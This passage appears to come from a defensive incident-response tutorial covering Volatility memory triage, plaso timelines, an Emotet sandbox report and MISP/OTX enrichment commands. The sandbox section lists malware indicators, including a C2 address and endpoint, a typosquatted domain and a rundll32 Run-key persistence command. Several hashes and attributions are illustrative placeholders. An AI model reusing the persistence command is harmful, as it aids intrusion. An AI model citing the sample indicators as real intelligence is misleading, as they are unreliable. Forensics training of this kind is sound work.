python3 vol.py -f /evidence/host01_20260521.raw windows.pstree.PsTree \
  | tee /evidence/pstree.txt
# => output columns: PID, PPID, ImageFileName, Offset, Threads, Handles, SessionId
# => review for:
#    - processes with PPID pointing to non-existent process (orphan = process hollowing)
#    - svchost.exe with unexpected PPID (should be services.exe, PID typically ~660)
#    - cmd.exe or powershell.exe spawned by unusual parents (see Example 35)
 
# Step 3: Network scan — find active and closed connections
python3 vol.py -f /evidence/host01_20260521.raw windows.netscan.NetScan \
  | tee /evidence/netscan.txt
# => output columns: Offset, Proto, LocalAddr, LocalPort, ForeignAddr, ForeignPort, State, PID, Owner
# => review for:
#    - ESTABLISHED connections to external IPs from unusual processes
#    - CLOSE_WAIT connections (recently closed C2 channels)
#    - processes listening on non-standard ports (backdoor listeners)
 
grep -i "ESTABLISHED" /evidence/netscan.txt | grep -v "127.0.0.1\|::1"
# => filter to active outbound connections, excluding loopback
# => example suspicious output:
#    TCPv4  10.0.0.45:52341  185.220.101.42:443  ESTABLISHED  3948  rundll32.exe
#    => rundll32.exe with external ESTABLISHED connection = highly suspicious
 
# Step 4: Dump suspicious process for static analysis
python3 vol.py -f /evidence/host01_20260521.raw windows.dumpfiles.DumpFiles \
  --pid 3948 --dump-dir /evidence/dumps/
# => dumps all memory-mapped files for PID 3948 (the suspicious rundll32.exe)
# => submit dumped .exe/.dll to sandboxes or run YARA against them

# ============================================================
# DISK FORENSICS TRIAGE — Autopsy CLI / plaso-based timeline
# Alternative to Autopsy GUI: use log2timeline + psort
# ============================================================
 
# Step 1: Generate a supertimeline with log2timeline (plaso)
log2timeline.py \
  --storage-file /evidence/timeline.plaso \
  /evidence/host01_disk.dd
# => processes all forensic artifacts: MFT, registry, event logs, browser history, prefetch
# => --storage-file stores the intermediate Plaso storage file for multiple analysis passes
# => this step may take 30-90 minutes depending on image size
 
# Step 2: Export timeline to CSV for analysis
psort.py \
  --output-time-zone "Asia/Jakarta" \
  --output-format dynamic \
  --write /evidence/timeline.csv \
  /evidence/timeline.plaso
# => output-time-zone converts all timestamps to local analyst timezone
# => dynamic format includes all available fields per event type
 
# Step 3: Filter to suspicious activity window (2026-05-19 02:00 to 2026-05-21 06:00)
grep "2026-05-19\|2026-05-20\|2026-05-21" /evidence/timeline.csv \
  | grep -i "MTIME\|CTIME\|ATIME\|CRTIME" \
  | grep -i "\\\.exe\|\.dll\|\.ps1\|\.bat\|\.vbs\|\.php" \
  | grep -i "temp\|appdata\|public\|downloads" \
  > /evidence/suspicious_files_window.txt
# => MTIME = last modification time (content change)
# => CTIME = metadata change time (attribute change, often used for timestamp analysis)
# => CRTIME = creation time (when file was first written)
# => filter to executable extensions in user-writable paths = attacker staging areas
 
# Step 4: Recover deleted files with photorec or tsk_recover
tsk_recover -e /evidence/host01_disk.dd /evidence/recovered_files/
# => -e = recover all files including deleted ones
# => attacker-deleted malware samples are often recoverable from unallocated space
# => recovered files lack original filenames; use file magic to identify type
 
# Step 5: Calculate hashes of suspicious files for TI lookup
find /evidence/suspicious_files_window_files/ -type f \
  | xargs sha256sum > /evidence/file_hashes.txt
# => submit hashes to VirusTotal, MISP, or internal TI platform
# => example: sha256: a3f2c1d4e5b6... → known Cobalt Strike beacon DLL

# Sample Sandbox Report Interpretation Guide
# Based on ANY.RUN / Joe Sandbox report structure
# File: invoice_may2026.docm | SHA256: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5
 
report_summary:
  verdict: MALICIOUS          # => automated verdict based on behavioral signatures
  threat_name: "Emotet"       # => detected malware family; cross-reference with CTI
  detection_score: 94/100     # => confidence score; >80 = high confidence malicious
  # => always verify verdict manually — false positives occur with new/obfuscated malware
 
process_tree:
  - winword.exe               # => document opened in Word
    - cmd.exe                 # => macro spawned cmd.exe — immediate red flag (see Example 35)
      - powershell.exe        # => PowerShell launched for stager download
        - rundll32.exe        # => rundll32 used to load downloaded DLL in memory
  # => this tree matches known Emotet macro -> PowerShell -> rundll32 chain
 
network_indicators:
  dns_queries:
    - "updates.micros0ft-cdn.com"   # => typosquatted domain — note zero replacing 'o'
    - "185.220.101.42"              # => direct-IP C2 communication (no DNS)
  http_requests:
    - method: POST
      url: "http://185.220.101.42:8080/api/v1/tasks"
      # => POST to /api/v1/tasks is Emotet's task retrieval endpoint
      # => submit this URL pattern to MISP as a network indicator
  established_connections:
    - "185.220.101.42:8080 (ESTABLISHED)"   # => primary C2 channel
 
file_system_changes:
  dropped_files:
    - path: "C:\\Users\\user\\AppData\\Roaming\\Emotet.dll"
      sha256: "f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7"
      # => dropped DLL is the main payload; submit hash to SIEM blocklist
  registry_changes:
    - key: "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
      value: "Emotet"
      data: "rundll32.exe C:\\Users\\user\\AppData\\Roaming\\Emotet.dll,Control_RunDLL"
      # => persistence via Run key (see Example 38)
 
ioc_extraction:
  hashes:
    - "d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5"  # document
    - "f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7"  # dropped DLL
  ips:
    - "185.220.101.42"              # => add to SIEM TI lookup and firewall block list
  domains:
    - "updates.micros0ft-cdn.com"  # => add to DNS blocklist and SIEM TI lookup

# ============================================================
# THREAT INTELLIGENCE ENRICHMENT — MISP + OTX API lookup
# Used during alert triage to add context before analyst escalation
# ============================================================
 
MISP_URL="https://misp.corp.internal"
MISP_KEY="YOUR_MISP_API_KEY"          # => store in secrets manager, not plaintext
OTX_KEY="YOUR_OTX_API_KEY"            # => AlienVault OTX API key from otx.alienvault.com
SUSPECT_IP="185.220.101.42"
SUSPECT_HASH="d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5"
 
# ---- MISP: Search for the IP across all events ----
curl -s -H "Authorization: ${MISP_KEY}" \
     -H "Accept: application/json" \
     -H "Content-Type: application/json" \
     -d "{\"returnFormat\":\"json\",\"value\":\"${SUSPECT_IP}\",\"type\":\"ip-dst\"}" \
     "${MISP_URL}/attributes/restSearch" | jq '.response.Attribute[] |
       {event_id: .event_id, category: .category, type: .type, value: .value,
        comment: .comment, timestamp: (.timestamp | tonumber | todate)}'
# => returns MISP attribute matches: which events reference this IP
# => .category = "Network activity", .type = "ip-dst" = destination IP IOC
# => .comment may include actor attribution or campaign name
# => example output:
#    {"event_id":"1423","category":"Network activity","type":"ip-dst",
#     "value":"185.220.101.42","comment":"Emotet C2 — TA542","timestamp":"2026-04-01"}
#    => TA542 = Mealybug/Emotet threat actor; confirms C2 activity
 
# ---- OTX: Look up the IP in AlienVault OTX ----
curl -s -H "X-OTX-API-KEY: ${OTX_KEY}" \
     "https://otx.alienvault.com/api/v1/indicators/IPv4/${SUSPECT_IP}/general" \
     | jq '{pulse_count: .pulse_info.count,
            pulses: [.pulse_info.pulses[] | {name: .name, tags: .tags, modified: .modified}],
            country: .country_name, asn: .asn}'
# => pulse_count = how many OTX community threat reports reference this IP
# => high pulse_count (>10) = well-known malicious IP
# => individual pulse names and tags reveal associated campaigns and malware families
 
# ---- Hash lookup in OTX ----
curl -s -H "X-OTX-API-KEY: ${OTX_KEY}" \
     "https://otx.alienvault.com/api/v1/indicators/file/${SUSPECT_HASH}/general" \
     | jq '{malware_families: .malware_families, pulse_count: .pulse_info.count,
            first_seen: .first_seen}'
# => malware_families array identifies known malware associated with this hash
# => first_seen tells you when the sample was first observed in the wild
# => example: {"malware_families":["Emotet"],"pulse_count":47,"first_seen":"2026-03-15"}
 
# ---- Consolidated enrichment output for SIEM annotation ----
echo "IP: ${SUSPECT_IP}"
echo "MISP: TA542 (Emotet C2), first seen 2026-04-01"
echo "OTX: 47 pulses, Emotet malware family, AS209 (CenturyLink)"
echo "Verdict: CONFIRMED MALICIOUS — Escalate to Tier 2, initiate containment"
# => this output feeds into the SIEM alert annotation and SOAR ticket